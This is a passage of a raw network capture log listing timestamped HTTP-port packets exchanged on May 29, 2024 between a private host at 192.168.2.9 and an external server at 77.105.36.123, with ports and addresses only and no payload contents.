May 29, 2024 15:42:08.079716921 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079727888 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079782963 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079823017 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079857111 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079868078 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079869032 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079916000 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.079936981 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079947948 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079958916 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.079998970 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080080032 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080130100 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080141068 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080151081 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080180883 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080182076 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080192089 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080210924 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080228090 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080239058 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080249071 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080260038 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080271006 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080276012 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080276012 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080317020 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080347061 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080370903 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080429077 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080446959 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080460072 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080471992 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080503941 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080518007 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080643892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080655098 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080665112 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080677032 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080691099 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080703020 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080734968 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080734968 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080746889 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080765963 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080777884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080790043 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.080817938 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.080817938 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.081284046 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.081327915 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.081337929 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.081348896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.081386089 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.081386089 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.081828117 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.081985950 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082003117 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082016945 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082020998 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082029104 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082041025 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082041979 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082051039 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082063913 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082076073 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082087040 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082097054 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082097054 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082097054 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082108021 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082118988 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082129955 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.082142115 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082142115 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.082233906 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.084561110 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084606886 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084621906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084634066 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084671021 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.084705114 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084714890 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.084772110 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084783077 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084817886 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.084861040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.084953070 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084964037 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084975004 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084985971 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.084997892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085009098 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085021019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085031033 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085040092 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.085040092 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.085042000 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085052967 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085063934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085074902 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085079908 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.085079908 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.085086107 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.085139990 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.085139990 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.101233959 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.101248980 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.101260900 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.101300955 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.101349115 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.146213055 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.146239042 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.146250010 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.146358967 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.168724060 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168744087 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168756008 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168853045 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168859005 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.168859005 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.168910980 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168921947 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168967962 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168978930 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.168987036 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.168989897 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169044018 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.169044018 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.169069052 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169080019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169090986 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169101000 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169115067 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169125080 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169137955 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.169153929 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.169189930 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191658974 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191690922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191703081 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191762924 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191762924 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191787004 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191797972 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191803932 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191808939 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191819906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191848993 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191849947 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191860914 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191870928 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191890001 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191901922 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191901922 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191907883 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191917896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191932917 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191936970 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191943884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191956997 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191977978 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.191991091 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191991091 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.191994905 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192006111 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192015886 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192015886 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192028046 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192039013 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192059040 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192081928 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192089081 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192147017 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192157984 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192229033 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192264080 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192276001 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192306995 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192323923 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192333937 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192346096 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192384005 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192413092 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192419052 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192424059 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192435026 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192445040 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192497969 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192524910 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192572117 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192583084 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192594051 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192605019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192617893 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192620993 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192627907 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192652941 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192663908 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192673922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192675114 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192683935 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192693949 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192707062 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192719936 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192728043 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192730904 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192740917 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192747116 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192751884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192764044 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192775011 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192800999 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192812920 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192823887 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192823887 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192825079 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192872047 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192903042 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192914963 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192930937 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192941904 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192943096 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192955017 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192965984 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.192997932 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.192997932 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193054914 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193065882 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193077087 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193087101 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193094969 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193099022 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193121910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193142891 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193172932 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193183899 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193196058 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193217993 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193228960 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193243980 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193244934 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193255901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193278074 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193315029 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193329096 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193381071 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193392038 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193440914 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193464041 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193474054 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193485975 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193496943 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193507910 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193520069 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193526983 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193537951 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193574905 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193583965 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193583965 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193586111 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193641901 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193655968 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193666935 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193676949 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193682909 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193689108 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193716049 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193734884 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193746090 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193757057 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193763971 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193768024 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193824053 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193825006 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193835020 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193845987 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193856955 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193867922 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.193902969 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.193902969 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.235816956 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.235923052 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.235945940 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.235958099 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.235980034 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.235990047 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.236001968 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.236011982 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.236020088 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.236041069 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.236067057 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258526087 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258541107 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258595943 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258613110 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258631945 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258644104 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258655071 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258666039 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258682966 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258687973 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258687973 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258693933 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258704901 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258716106 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258734941 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258743048 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258747101 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258752108 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258763075 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.258771896 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.258806944 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.281385899 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281423092 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281579018 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.281800032 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281812906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281826019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281836987 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281847000 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281861067 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281867981 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.281882048 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281893969 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281939983 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.281954050 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281965971 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281977892 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281982899 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.281987906 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.281999111 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282001019 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282047033 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282047033 CEST	49709	80	192.168.2.9	77.105.36.123
May 29, 2024 15:42:08.282186985 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282196999 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282207966 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282217979 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282228947 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282234907 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282244921 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282254934 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282265902 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282285929 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282296896 CEST	80	49709	77.105.36.123	192.168.2.9
May 29, 2024 15:42:08.282305956 CEST	49709	80	192.168.2.9	77.105.36.123
